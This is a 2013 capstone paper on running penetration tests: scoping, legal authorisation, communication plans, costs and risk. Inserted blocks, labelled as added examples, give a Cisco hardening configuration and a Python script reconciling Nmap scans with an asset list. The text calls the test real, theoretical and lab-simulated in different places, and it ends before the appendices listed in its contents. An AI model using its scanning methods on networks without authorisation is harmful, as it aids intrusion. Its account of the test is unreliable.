
Effective Penetration Testing

Kevin Pescatello

A Capstone Presented to the Information Technology College Faculty

of Western Governors University

in Partial Fulfillment of the Requirements for the Degree

Master of Science in Information Security Assurance

22-Jan-2013

Effective Penetration Testing

Effective Penetration Testing Page 2

Copyright © 2013 Netwerk Guardian LLC

Abstract

This paper will cover the importance of providing penetration-testing services that comply with laws and corporate governance. Not every penetration testing service provides the proper structure for execution. Some engagements provide a good testing scenario of what and how to test but fail to provide the supporting documentation, communication, and legal counsel throughout the process. This project will cover a real-life penetration test from start to finish, including the best practices used and required for legally complying with laws and corporate governance. The paper will present a case study of a real penetration test, provide the business dynamics as well as the technical objectives required to test, and provide countermeasures for an organization. The documentation and artifacts that support the legal and technical requirements are provided in the appendix. The body of the paper will cover the testing preparation, methodology, and execution. All the information provided in the report has been changed to protect the identity of the client used in this paper.


Table of Contents

Introduction
  Project scope
  Defense of the Solution
  Methodology Justification
  Organization of the Capstone Report
Systems and Process Audit
  Audit Details
  Problem Statement
  Problem Causes
  Business Impacts
  Cost Analysis
  Risk Analysis
Detailed and Functional Requirements
  Functional (end-user) Requirements
  Detailed Requirements
  Existing Gaps
Project Design
  Scope
  Assumptions
  Project Phases
  Timelines
  Dependencies
  Resource Requirements
  Risk Factors
  Important Milestones
  Deliverables
Methodology
  Approach Explanation
  Approach Defense
Project Development
  Hardware
  Software
  Tech Stack
  Architecture Details
  Resources Used
  Final Output
Quality Assurance
  Quality Assurance Approach
  Solution Testing
Implementation Plan
  Strategy for the Implementation
  Phases of the Rollout
  Details of the Go-Live
  Dependencies
  Deliverables
  Training Plan for Users
Risk Assessment
  Quantitative and Qualitative Risks
  Cost/Benefit Analysis
  Risk Mitigation
Post Implementation Support and Issues
  Post Implementation Support
  Post Implementation Support Resources
  Maintenance Plan
Conclusion, Outcomes, and Reflection
  Project Summary
  Deliverables
  Outcomes
  Reflection
References
Appendix A: Network Devices
Appendix B: Critical Services
Appendix C: Penetration Test Plan
Appendix C: Penetration Test Action Plan (Con't)
Appendix D: Audited IT Processes
Appendix D: Audited IT Processes (Con't)
Appendix E: Qualitative Risk Matrix
Appendix F: List of Legal Concerns
Appendix G: Sample Contract
Appendix G: Sample Contract (Con't)
Appendix H: Sample Contract (Con't)
Appendix I: Data Breach Calculator Report
Appendix J: Penetration Results and Countermeasures
  Executive Summary
  Test Objectives
    Port Scanning Results and Issues
      Scanning Windows machines
      Countermeasures
    DoS/DDoS Testing
      Countermeasures
    Application Server Testing
      Countermeasures
    Sniffing and MITM Attacks
      Countermeasures
Appendix AA: MBSA (Microsoft Baseline Security Analyzer) Scan Results
Appendix AB: Nmap Scan Results
Appendix AC: Nessus Scan Results Application Server MAXWELLSM
Appendix AD: Nessus Scan Results Network
Appendix AE: Communication Plan


Introduction

This paper outlines the issue of a penetration test failing and details how an effective test should work. What happens when a business requests a pen-test but the company providing the service does not capture the requirements correctly? In addition, the pen-test company that performs the test does not always perform it with best practices. The process from soliciting a request for proposal to identify security posture through planning is where the pen-test company may fail to provide accurate results. Often the meeting of the two companies is a short time frame and requires both sides not just to hear but to listen to the requirements and provide a well-documented response. While the choice to get a pen-test is not difficult, the dynamics of preparing and executing one are quite involved. Many penetration tests do not perform as well as they should because of poor planning or communication, and at times both. This paper will outline the costs, failures, motives, and methods needed to review the security posture at a company.

Project scope

This project will include the entire process of presenting the need for the penetration test, the acceptance with scope of work, signed written consent, communication plan, action plan, list of assets and scan-type activities, penetration methods, documentation, and a paper report as attachments concluding the penetration test. This paper will not include any client-specific information relating to the solicitation, presentation, and procurement of the contract. The information provided in this paper demonstrates a theoretical scenario in which Certified Ethical Hackers have provided a best-practices approach to security assessment and penetration testing.

Most companies do not understand the need for a penetration test but will experience either a breach or a denial of service that will affect them. Rather than waiting for the inevitable, the project will present research on how pervasively criminal intent permeates the internet in search of new targets. Once that message has been received and accepted, the project will detail the scope of work that will be conducted based on needs and cost. Time has dictated the direction of this project, and so a sample agreement and action plan will be provided to demonstrate the fundamentals of penetration testing. The communication plan is key to this project's success, as this is one of the pivotal factors that, if not done correctly or at all, will completely remove the effectiveness of testing. The scan-type activities are going to enumerate the network and identify systems and, when possible, known vulnerabilities before attempting any penetration testing. Automated tools will help assess the situation while leaving the manual coding for the penetration test. This includes the methodology used in the test, which will be automated and manual once targets are identified.

All the activities herein will create documentation that will serve two purposes. The first purpose is to gain a better grasp of the inventory one holds onsite and the associated risks. The second purpose will be to prepare the company for a security standard certification and accreditation. The final report will be the assessed security posture of the company and the countermeasures it should put in place to secure the infrastructure.

Defense of the Solution

This topic was chosen because the candidate has found that not all security providers follow best practices for penetration testing and often leave out some fundamental part that causes poor execution, poor results, and, worse, disappointed clients. The security industry requires that professionals provide best-in-class formulation of strategy when performing tests, yet these strategies are often not shared. The information security market has not realized its full potential in its effectiveness to secure corporate and public sector networks. The poor security practices through which information has been leaked are the cause of the spike in hacking events in 2012. The paper will go through the details and necessary activities of the perfect penetration test. It is public knowledge that not all penetration-testing companies follow the best practices. It is also noted that not all penetration-testing companies have the same expertise.

There will also be a survey asking penetration testing companies to participate in a review based on what is going on in the industry. This review will be for the company taking the survey and for its view of the competitive landscape. Seeking participation in this survey is challenging because the survey asks for truthful but anonymous responses. This information will support the solution and the reason for this research.

Methodology Justification

The following information explains the root cause of the problem associated with penetration testing. This paper will go into detail on the process of soliciting the right company to perform a penetration test, one that details the security posture and the weaknesses that could interrupt business processes or reveal confidential information. There will be an actual penetration test that incorporates the best practices explained herein and solves the problem of ineffective testing. Additional documentation attached in the appendix provides the scope for the test and the reasons behind it. The causes and impact will address what normally happens during these engagements and what should happen. The paper will outline the framework required to test a specific company, detailing the action items that company has to take for information security assurance. An analysis will begin based on research of recent reports on data and intellectual property theft, costs for testing, and the costs associated with not testing. Finally, the paper will address a solution that produces relevant results.

Organization of the Capstone Report

The report will go through and explain what needs to be done for a typical company looking for a penetration test. It will list and discuss the requirements and provide documentation examples of the dynamics of preparing the company for this type of activity, as well as the company preparing its assets for review. The path that the project will take will be one step of activity followed by a discussion of best practices and, where applicable, the most common mistakes or caveats. The paper will detail the actual appointment of testing with a communication plan and planned tests. Notably, the testing can take a different direction based on the results found and require more or less effort depending on what is being tested for. This will be an example of how dynamic the process is and what can be learned from it. The artifacts created will provide insight into the business processes the company requires to function and be profitable. They will also show where possible vulnerabilities can be exploited or where devices fail. These artifacts are in the appendix for review.

Systems and Process Audit

In the following sections, the typical business is to audit the assets that are on site and pose a risk either by design or by implementation. The company that is the subject of the penetration test will list all the devices in preparation for the test. Each asset owner responsible for the integrity and operation of a device will provide a list of devices and their function. The company will provide the business justification for the device and why it is in use today. This business use will be reviewed by the pen testing team to see if the services used justify the existence of the device on the network, based on industry experience. This will be a form of checks and balances on what management provides as business use in their processes. If the two match, then there is good cause for its existence. If there is a disparity of use, then it is probably time to review its effectiveness. The list of processes associated with the assets will be in Appendix B. The search here is for a return on investment associated with a process or asset. If none exists, then why test it?


Audit Details

The penetration test team was able to simulate penetration testing of an actual client and meet with a high-ranking officer to coordinate the evaluation of assets. Typical services that are provided in a company were also evaluated. This included network devices, services that ran on the network, applications, and the supporting processes. These supporting processes were not the type of processes that are normally audited in a security standard accreditation and certification, but ones conducted in order to benefit directly from the device's purpose. We found that the company had purchased numerous network devices, including switches that support enterprise-class configurations and management, and servers, listed in Appendix A. The server on the network consisted of one platform that we will be testing, as well as unique services running on it. The IT department personnel that were interviewed explained their tasks associated with each device or service, recorded in Appendix B. This document shows the critical services associated with devices in a map and in a table for ease of reading.

When the interview began, the approach was to determine what technology supported what business process and how many times technology is used. Beginning from the project bid being awarded, there is human input required to enter that data into the core business application, called Streetsmarts. This was done by the operations manager and required a workstation and a LAN (Local Area Network) connection to the server and VoIP (Voice over Internet Protocol) services. Once the project is in the system and resources are assigned to the project, tickets are made for each truck leaving the yard with asphalt. The tickets possess project and customer information required for accounting and have to be entered into the system. This is the second time that technology has to be used in order to operate and provide a profit. In summary of the remaining processes, the total number of technology-dependent business operations, including network devices, was twelve (12). It is true that if the server were down for a long period there would be no way for the company to keep efficient records and remain profitable. There would be an increase in person-hours and contingent support processes to maintain some workflow, but it would end the company's ability to compete successfully.

Problem Statement

The company called upon the pen testing team to ascertain where their security posture was in relation to their network device footprint. This was the first problem to address, because they were asking a very vague question. What they should have asked was what must be done to ensure that their internal services are not denied availability and that the integrity of data does not suffer, causing business impact. The pen testing team introduced the company to a tool that they could use to establish which devices and services are important to keep running and their severity (Appendix D). This is illustrated in the form of a device and process map, which can be seen as a list in Appendix B.

Problem Causes

The company knew about the recent rise in hacking events around the world and the possibility that it could happen to them. However, their approach was wrong in that they wanted the pen testing team to test what they had in place and give them a report based on patch level and weaknesses. They never thought about configurations, operational behavior with devices, or the users' influence. What was discovered was that the network was all built on an untagged VLAN with no other security precautions made to suppress layer two (2) exploits. The VoIP network ran on the same data network without an encrypted protocol like SRTP. There was anti-virus software but no intrusion detection or prevention device to alert on or mitigate threats.
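As an added illustration that is not from the paper or the client's actual configuration, the three findings above mapped to switch-side settings. The paper does not name the switch vendor, so Cisco IOS syntax is assumed, and the VLAN numbers, interface names and IDS sensor port are constructed. The first fragment is the weak state the paper describes; the second is the corrected form. SRTP is configured on the call server and phones rather than the switch, so the voice VLAN separation complements it but does not replace it.

```cisco
! --- Weak configuration (as found): every access port untagged in the default
! --- VLAN, voice and data share one broadcast domain, no layer-2 protections.
interface range GigabitEthernet1/0/1 - 24
 switchport mode access
 switchport access vlan 1
!
! --- Corrected configuration (constructed example: VLAN 10 = data, VLAN 20 = voice)
vlan 10
 name DATA
vlan 20
 name VOICE
!
! DHCP snooping blocks rogue DHCP servers and builds the binding table that
! Dynamic ARP Inspection uses to drop the spoofed ARP replies behind LAN MITM/sniffing.
ip dhcp snooping
ip dhcp snooping vlan 10,20
ip arp inspection vlan 10,20
!
! Access ports: separate data and tagged voice VLAN, at most two MACs per port
! (phone plus PC), and err-disable the port if it sends spanning-tree BPDUs,
! which indicates an unauthorized switch has been plugged in.
interface range GigabitEthernet1/0/1 - 24
 switchport mode access
 switchport access vlan 10
 switchport voice vlan 20
 switchport port-security
 switchport port-security maximum 2
 switchport port-security violation restrict
 spanning-tree portfast
 spanning-tree bpduguard enable
!
! Only the uplink toward the router/DHCP server is trusted for snooping and ARP inspection.
interface GigabitEthernet1/0/48
 description Uplink to core/router
 switchport mode trunk
 switchport trunk allowed vlan 10,20
 ip dhcp snooping trust
 ip arp inspection trust
!
! Mirror both VLANs to the port where an IDS sensor (the detection capability the
! paper notes was absent) can see the traffic without sitting inline.
monitor session 1 source vlan 10
monitor session 1 source vlan 20
monitor session 1 destination interface GigabitEthernet1/0/47
```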


Business Impacts

When a company looks to a professional service like penetration testing, they are looking for results that reveal their security posture. These results will give them the direction they need to move forward. The Sophos Naked Security blog reports, "By giving your pentesters a comprehensive overview of the application and access to architecture diagrams, configuration and even source code, you can give them a head-start and counter this asymmetry" (McKerchar, 2012). This will help them align security around business processes, as most of their processes run on the network infrastructure. The key here is to take the resultant report and use it as a road map to a more secure infrastructure. When a company does not invest in this type of assessment, the integrity of its business processes is at risk. The technology that helps a business compete is also the same technology that can stop it. The business case is what must be done to determine the effectiveness of the company's network defenses that ensure the continuity of the business.

Cost Analysis

The costs required to perform the penetration test and reporting are based on the size of the company's assets and the depth to which the testing should go. Typically, the costs start around $2,500.00 and range upward on average to $37,500.00 for most SMBs (Small and Medium Businesses). This will cover the testing and reporting, but the action required of the company will be an extra cost. The average cost would equate to $150.00 to $200.00 hourly for a skilled pen tester. Enterprise-sized companies can expect to see something in a higher range depending on size and the difficulty of masking the attack.

The client that has agreed to the penetration test for this project is looking to have the following tested: web application, network load resiliency, workstation, and domain controller. The cost associated with such a test will be reflected in the test plan and a schedule in Appendix entries C and F respectively. The cost will be $1,600.00 since the test is one type of each device and two services.

Risk Analysis

The risk associated with this process is that the normal behavior is to fail. Improper targets, no risk assessments, misinformed clients, no legal counsel sought before the engagement, and the selection of the wrong pen-testing group will all lead to failure. We know the risks of an attack are high because we live in a highly interconnected world. Some startling facts will put things in perspective to get a penetration test done the right way. An October 2012 report from Imperva stated that the following attack types are on the rise in discussions on hacker forums: 19% DDoS and 19% SQL injection. Notably, the article states that security professionals do not spend time on hacker forums to learn the tools and techniques (Imperva, 2012). The Verizon Data Breach Investigation Report for 2011 highlights some of the most significant threats and their mode of insertion. It reported that most data breaches "98% stemmed from external agents, and 58% of all data theft was tied to activist groups. In addition, 98% attacks transpired on servers and were not difficult to execute" (Verizon, 2012). Therefore, it is paramount that when considering a penetration test you know your systems and what to test.

When trying to find statistics that support the success and failure of penetration tests, it will be hard to acquire that data in the duration of this paper. A few inquiries had gone out to penetration testing companies and the feedback was minimal, but this is what it reported. The following reports come from in-depth research beyond the right way and steps to conduct a penetration test. A company called Netragard was able to produce a publication that reflects the objective of this paper. In the publication, Netragard highlights the terminology and the differing perspectives that make the objective of penetration testing subjective to the buyer. It is unfortunate that not all companies are providing the best service in terms of the services advertised alone. Before that end is reached, here is what Netragard had to say about terminology. Penetration testing is just that: breaking through something to test an exploit. "Since Penetration Tests are tests, they must determine the genuineness of the vulnerabilities that they identify, hence the word "test". In most, if not all cases this determination is done through exploitation" (Netragard, 2012). If you are going to test something, then do that. Most times, clients buying a service think that vulnerability scanning and reporting is all that is necessary. This is incorrect.

Penetration tests have a statistical average of success and failure. While these rates may not be easily discovered, a recent survey of professionals has been included in this project. In self-review, most companies estimated that around 17% of their engagements were unsuccessful, meaning 83% of what they do is delivered and accepted. Peer review of the industry put the unsuccessful rate 8% higher, at an average of 25%, so 75% success on assignments. This project has made it explicitly clear that communicating with and educating the client about what the penetration test is intended for helps move these ratios toward a higher success rate. During the survey, many of these companies were given a chance to comment on the factors that help or inhibit a penetration test.

The respondents stated, from field experience, the following key factors that help promote a successful penetration test. A test is most effective as a white box test where network diagrams and user accounts are made available. Respondents also noted that automation can only take you so far and that creative manual testing will often provide points of entry. Social engineering, while not utilized in this test, has been a big provider of information from the general user population. Survey participants noted that even seasoned security professionals on site would tip their hand to sensitive information, providing a way to plant a rootkit or back door. The following freestanding statements provide interesting points that support the project's goal, technically and in communication. One respondent stated that having a good communication plan, including agreed-upon limits for testing, is a good practice. Know the effects of the tools before you use them, so that the observed result is the expected one. It was also reported that a cooperative staff on the client side often yields better results, testing exactly what the client needed. Clients that take security seriously and have policies surrounding security produce reports with close to zero exploits.

The other side of effective penetration testing is when a test does not deliver what is outlined in the test plan, or fails to test at all. Survey respondents stated that pen tests are treated like a witch-hunt: the client balks, and if anything is found they treat it as their own failure. Terminology is a second problem; the objective of the penetration test is often miscommunicated, and terms such as vulnerability assessment and penetration test are confused. Those two terms are not the same. Running tools that you are not familiar with yields results adverse to the test plan and, worse, adverse to the client's devices. A hardened network infrastructure is not a reason to call a penetration test a failure: while nothing may be exploited, the test ran according to plan.

Detailed and Functional Requirements

Functional (end-user) Requirements

The company in this case is the end user that must provide documents and configurations to the pen testing team in order to make the best use of time and resources. This gathering of information must start in the operations manager's office, with the understanding that we need to speak with all the asset owners in order to capture the assets and the way they are used. Since the client has a small operation, the current office was just fine. Legal counsel must be sought to represent the client's best interest and to address the consequences. Good and bad can come from penetration tests, and the liability has to be addressed and agreed upon by both sides. Seeking a lawyer with a technical background in penetration tests will be the best choice. The laws that mandate compliance for publicly traded companies are stricter and further reaching, and the requirements that are to be tested need to match the legal requirements. During the test there must be communication between the pen test team and the client to ensure that no permanent damage occurs from testing. The client will have to draw a line as to what is permissible and what is not. This paper strongly holds that communication during a penetration test at a site is paramount in order to stay on plan and provide results without impacting the client or damaging assets. While the penetration test in this project was simulated in a lab rather than on the client's site, the infrastructure was an exact copy. Good communication helps the pen testers as well as the client requesting the test. A sample communication plan is inserted for completeness of the project.

Detailed Requirements

The company will use the sheet provided in the appendix to track assets and the processes associated with each device. Next, they will have to evaluate the severity of each process and what the outcome would be if that service, and eventually the device, were not available. The pen test team will take this information under review but will also provide their own assessment after the test. That evaluation will be included in the final report. All legal arrangements must be made concurrently while both sides work toward a plan and an agreement. This agreement will need to be reviewed by both sides' attorneys.


Existing Gaps

The current state of penetration testing relies on the penetration testers doing a perfect job of informing the client of the requirements and then testing against those requirements. The gap lies between the information presented and the information comprehended; as noted earlier, this can be test types that are not fully understood. If the industry as a whole could close this gap, it would help the client in many ways. There needs to be a link to common terms that both sides understand. The client will also know that the test will only work if the objectives they provide are clear and not vague. The next thing that will change is the way the industry is viewed. There is a perception that security is an unneeded expense and that high-tech analysis is really a luxury. Companies will eventually get the security services they need to get a snapshot of their security posture and action items to remedy any variance from the goal. In addition, the project will identify security standard certification steps that a company can follow so that the expense and effort count twice.

Project Design

Scope

This project is going to include the presentation of terminology correctly used in this field, a guideline for how a penetration test should be planned and executed, and the dynamics of the process of doing a penetration test. The project should tell a clear message of how to proceed with a penetration test, for the client and for the professional organization providing the service. The documentation that will be provided will give the reader a better understanding of what it takes to have an effective penetration test. The statistical analysis, testing, and survey should clarify the inhibitors and enablers of effective penetration testing. What will the project include and exclude?


Assumptions

The following assumptions have been seen or demonstrated in the industry: contradicting views on terminology, insufficient definition of assets and targets, poor execution of penetration tests, little or no legal counsel and agreements prior to commencing, and the best talent used incorrectly.

Project Phases

There are various phases over the course of a penetration test that need to be executed the right way from the start. The phases of this project encompass these but also include other phases: problem statement, preliminary research for a solution, in-depth research, meeting and planning with the client with signed written approval, performing the assessment, and providing the report. These can be bulleted as follows:

• Phase 1 – Problem Statement (reason for the research)

• Phase 2 – Preliminary Research (supporting the problem)

• Phase 3 – In-depth Research (survey of pen-testers)

• Phase 4 - Meeting and Planning

• Phase 5 - Assessment (actual penetration test)

• Phase 6 - Reporting

In phase one we have the project, its problem statement, and what we are going to prove. Industry knowledge, recent articles, and education will present the problem and how it can be fixed by following the right process. When phase two starts, the problem will be confirmed by preliminary research from recent reports on the effectiveness of penetration tests to date. Most will be industry knowledge, plus a few supporting reports and publications from penetration testing companies. The third phase is where the project gets real-time information from professionals in the field and incorporates it into the project as survey results. These results will confirm phases one and two and identify the conditions that can help or inhibit the penetration test in phases four through six.

Just like going through a security audit, we must identify the assets that need to be tested and their owners. This is important because we have to know how they are used every day and which services really need testing. This is where most companies make a mistake: they hand the keys to the pen testing group and say "please test these devices", but for what? The pen test team will want to review with the CIO what daily operations are like and what services are being used over the internal and external-facing network. This interview will help the pen test team ask the right questions and steer the company toward the right testing requirements. In addition, it helps gauge what level of testing and time will be required, and thus the right fee. Shortly after the meeting, the company will be engaged in inventorying their production assets and the services on them as they are being used.

The next step, phase four, is where the pen test team takes the information from the client and builds a test plan. This test plan covers what the client wants tested and how the team is going to do the test. A good penetration test team will have a communication plan stating when they are executing certain attacks and what the outcome should be. The IT manager or director should be the only person besides the executive officers who knows a test is in progress. This liaison between the company and the pen test team will alert the lead pen tester if anything is adversely affecting daily operations, if that is what has been agreed. It may instead be agreed not to stop an attack, letting things break in order to test how well the company's IT personnel respond. The plan will be submitted in person, with the legal written contract, for the client to review. The contract details the impact of the test and states that the pen test team will not be prosecuted for conducting, inside or from outside the company, activity that would otherwise be illegal. The contract needs to be signed by the CEO or CIO of the company, giving written approval for the penetration test, because of the potentially damaging impact it can have on assets. Both sides' legal resources must review the legal obligations prior to signing the contract. There may be some tests that the client is not so accommodating on and will not allow to take place. The agreement will be as comprehensive as the test plan; in fact, the test plan is what will be signed as the two sides go over every test.

The fifth phase of this project is the actual penetration test itself. At the time the company chooses, the pen test team will insert themselves into the network and begin their assessment. If the pen test team gets the cooperation of the company to do a white box test, it will go faster and less cost will be incurred. If the company has chosen a black box test, the cost will be substantially higher. This phase of the project is where the dynamics are in play. The ethical hackers are scanning and footprinting the entire architecture to make sure it matches any documentation provided. They work according to the test plan, executing vulnerability assessments and then exploiting what they have found. Appendix C details the test plan: which networks and machines are targeted with which attack, and what the result should be if the target is exploited. The client may very well provide a list of items already scanned and identified as weak and want to know what to expect if a service or device is taken down.
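One concrete piece of phase five is the check that the footprinting results actually match the documentation the client handed over. The following Python script is an added example, not code from this capstone or from the tools it names: it parses Nmap's XML output (the -oX format) and reconciles it against the client's asset sheet, flagging hosts the client never documented, documented hosts that did not answer the scan, and sanctioned hosts exposing services outside their documented set. The inventory, the addresses and the Nmap XML are constructed for the example; a real run would feed it the output of nmap -sV -oX scan.xml against the in-scope ranges and the sheet from Appendix A.

```python
"""Reconcile an Nmap XML scan against the client's documented asset inventory.

Added example for the capstone's phase five; not the paper's own code.
The inventory and the scan XML below are constructed so the script runs
offline. In an engagement, the XML comes from `nmap -sV -oX scan.xml <scope>`
and the inventory from the asset sheet the client fills in.
"""
import xml.etree.ElementTree as ET

# Constructed inventory (assumption): what the client says exists and which
# TCP services are sanctioned on each host. Addresses are RFC 1918 placeholders.
DOCUMENTED_INVENTORY = {
    "10.0.0.10": {"role": "domain controller", "ports": {53, 88, 389, 445}},
    "10.0.0.20": {"role": "web application", "ports": {80, 443}},
    "10.0.0.50": {"role": "workstation", "ports": set()},
}

# Constructed scan output in Nmap's -oX layout: one <host> per target with
# <status>, <address> and a <ports> list of <port> elements.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.0/24">
  <host><status state="up"/><address addr="10.0.0.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="53"><state state="open"/><service name="domain"/></port>
      <port protocol="tcp" portid="88"><state state="open"/><service name="kerberos-sec"/></port>
      <port protocol="tcp" portid="389"><state state="open"/><service name="ldap"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.0.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
      <port protocol="tcp" portid="22"><state state="filtered"/><service name="ssh"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.0.77" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="5060"><state state="open"/><service name="sip"/></port>
    </ports></host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ipv4: set(open TCP ports)} for every host Nmap reports as up."""
    observed = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addrs = [a.get("addr") for a in host.findall("address") if a.get("addrtype") == "ipv4"]
        if not addrs:
            continue
        open_ports = set()
        ports = host.find("ports")
        if ports is not None:
            for port in ports.findall("port"):
                state = port.find("state")
                # Only open TCP counts; filtered/closed is not an exposed service.
                if port.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
                    open_ports.add(int(port.get("portid")))
        observed[addrs[0]] = open_ports
    return observed


def reconcile(inventory, observed):
    """Diff the scan against the inventory and return three findings lists:
    hosts the client never documented, documented hosts that did not answer,
    and sanctioned hosts exposing ports outside their documented set."""
    unexpected_ports = {}
    for ip, entry in inventory.items():
        extra = observed.get(ip, set()) - entry["ports"]
        if extra:
            unexpected_ports[ip] = sorted(extra)
    return {
        "undocumented_hosts": sorted(set(observed) - set(inventory)),
        "missing_hosts": sorted(set(inventory) - set(observed)),
        "unexpected_ports": unexpected_ports,
    }


if __name__ == "__main__":
    for name, finding in reconcile(DOCUMENTED_INVENTORY, parse_nmap_xml(SAMPLE_NMAP_XML)).items():
        print(f"{name}: {finding}")
```

Each of the three findings maps onto a question for the client before exploitation starts: the undocumented host at 10.0.0.77 (a SIP endpoint, which on this client's network would be one of the untested VoIP phones) is either out of scope or a gap in the asset sheet; the silent workstation at 10.0.0.50 may be powered off, which is exactly the tampering the Risk Factors section warns about; and RDP on the domain controller is a service nobody sanctioned and a candidate for the test plan.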

The last phase, number six, is the reporting portion of the project. What will be proven here is whether the penetration testing team listened to the client and executed. The report should contain the test plan objectives with a detailed explanation of how each test resulted. Next, the report should contain suggestions that will help the client remediate any vulnerability exploited during the test.

Timelines

Each step in the process must be completed in a relatively short, agreed-upon time. The nature of the testing and the urgency of reporting are vital to both the client and the pen test team. Phase one has already begun and will take about 14 days to complete. Phase two was kicked off about a week after phase one in order to provide facts for the argument to be proven by the candidate. After about a week of statistical research, phase three was started. Phase three will be the longest, as it is very difficult to get people to participate; however, these are real-life statistics that come from the field. The candidate will have to perform a theoretical test based on a local client to apply this theory about an effective penetration test. The interview and review of documentation will provide a sample of data that will be measured against the best practices for effective testing.

Dependencies

Phases four through six cannot be completed until phase three is done. Notably, phases four through six also cannot be completed until a client is secured; even if the test is theoretical, it will be based on a real client network. The interview with the client must occur before the scheduled phase five in order to complete the project. Once the requirements are outlined and understood, the rest of the project will proceed as scheduled.

Resource Requirements

The hardware requirement is that the test take place on a network with routers, switches, and servers. The labor required is at least one tester, with no maximum, though two or three will expedite the testing far more than one. The agreement will require an additional resource, an attorney, who reviews the legal document that authorizes and binds the two parties to operate professionally with the client's interest as the focal point. The company providing the service will provide the names of the team members who will be coming onsite or working offsite to perform the test. They will have to comply with company policy: the participants must all be US citizens and have a clean criminal record, or one that has been made right, as documented by testimony of character and the signature of the individual recommending them for this service. The pen test team will use the communication plan so that the testing remains on schedule and adheres to the test plan.

Risk Factors

There is a possibility that outside forces can affect the testing. If the day of the penetration test becomes known to more than just the operations manager or president, it can have adverse effects: administrators and asset owners will be hardening their devices, or maybe even shutting them off or acting outside their normal routine to throw the test. This type of testing is very imposing and intrusive, not just because of the type of test but also because of what it means. The test is a measure of a company's applied security practice. People can influence the test just as people can influence an experiment, by tampering with the subject matter or communicating what is happening, so that responses are not authentic. This will taint the test.

Other conditions can intrude upon the test and make it difficult to execute. The penetration tester can have an off day or fail to push a test as far as it can go. Time constraints and other operational issues may keep a test from moving according to plan.

Important Milestones

One of the most significant milestones this project can have is the meeting with the client. This is by far one of the most rewarding experiences, where the penetration testing team can help a client determine the level of security of their infrastructure. Educating the client on the terminology and the risks facing their company will prepare them for the test and for the real world. Moreover, removing any barriers and resistance to investing in security will be done at this point, by demonstrating a return on investment. The second milestone, and the most anticipated, is the actual test. The test will have a schedule to adhere to, but that does not mean the testers will not have the option to perform certain exploits outside of the script. You can only speculate at the planning stage about what you will be doing; the rest will be figured out on site. Unplanned environmental changes occur, and the team may have to come up with another entry into the system, or possibly even stop an attack if it exceeds the threshold mutually agreed upon by the client and the testers. The last milestone will be the report. When all the testing activity has subsided and the network is back to a normal state, a report will be made. Here is where a learning opportunity presents itself to the client. The results will show where they are weak, and a remediation plan will show how they can counter their vulnerabilities.

Deliverables

The deliverables will be a well-designed approach to the project, a meeting and signing of the contract agreement and test plan, a list of considerations for the legal implications, an action plan (the pen tester's schedule), a communication plan, and a test results and countermeasures report. Most of what will be provided is working documents and results. The tools used to achieve this will be BackTrack 5 R3, Nessus, Armitage, Nmap, and Microsoft Baseline Security Analyzer (MBSA). The way in which they are used will be in the report.


Methodology

The methodology implemented in this project is a theme based on the fundamentals of reading, understanding, and executing. When the penetration testers engage the client, they want to educate the client and establish a shared understanding of the terminology. Once this is accomplished, the dialogue that takes place will be natural, as the exchange of questions and answers helps move the client along to getting their test objectives correctly set. As the client moves through each phase in this project, the penetration testers will manage the client to ensure that, once they understand what needs to be done, they begin providing the documentation of assets for a speedy and thorough test. This is another checkpoint of the fundamentals: to review who we are, why we are here, and what exactly is going to be tested. The methodology of planning, doing, checking, and acting is a common theme among security standards. It is fundamental to validating the details, to make sure the assets and supporting processes really are the ones that matter. Pivot Point Security brings up the fact that a well-scoped penetration test requires a lot of effort, and a full security audit more so (Pivot Point Security, 2012). So the first phase will be addressed by planning and by the communication required to achieve the next phase.

The second phase is the research, and here we relied on industry knowledge and awareness along with some sources. This is where we look at the problem at a high level. The issue of being effective exists here, and we now have to look at what we are going to do about it. Additional sources have been provided to show just how stark reality is when nothing is done about security. Phases one and two are closely related, but phase three is where the methodology changes from traditional research to real-time investigative queries. The response to the survey, which will shed some real-time light on the issue, is slow in coming.

Phase four takes the project into a new dimension, as research and planning are applied directly in the project. A real-life penetration test begins, and the client is going to benefit from it. The dynamics of business, technology, and economics come into play as the client reaches for security and the penetration tester extends to deliver a business solution. The resulting economic exchange benefits both parties, as the payment is an investment in the longevity of the company. As we progress through the phases, the real-time interaction goes up and the amount of research decreases. In the last phase, the reporting goes back into a research mode, as the penetration team provides the reasons for the holes and the best countermeasures to close them.

The strategy used here is the fundamental approach to an effective penetration testing initiative. Other methods cannot produce results because they miss the mark: they miss the targets of educating the client and providing the objectives and the rationale for the test plan. The products of going through this process, such as the legal framework and the documentation created, can be applied to ISO 27001/2 certification and accreditation, FISMA, and HIPAA compliance.

Approach Explanation

The approach to solving the problem is to carefully identify the problem and understand why it is not working. The past has shown that a combined failure rate of about 20% is not exemplary. In order to identify what is going on, you have to slow down and identify the pieces that interact to bring the results you are looking for. The way this project is scheduled is to do just that. Theoretically, one could just run through the activities and try to do a better job than the first time through the penetration test. That approach is doomed to fail, since there is no change in activity except a more careful second pass at the same environment. The issues are still present, and no one has learned the difference, or the importance of taking the time to identify the underlying issues. Questions remain as to whether it was the process, the documentation, the communication, or even the testing skill set. Repeating something over and over and expecting different results is akin to insanity.

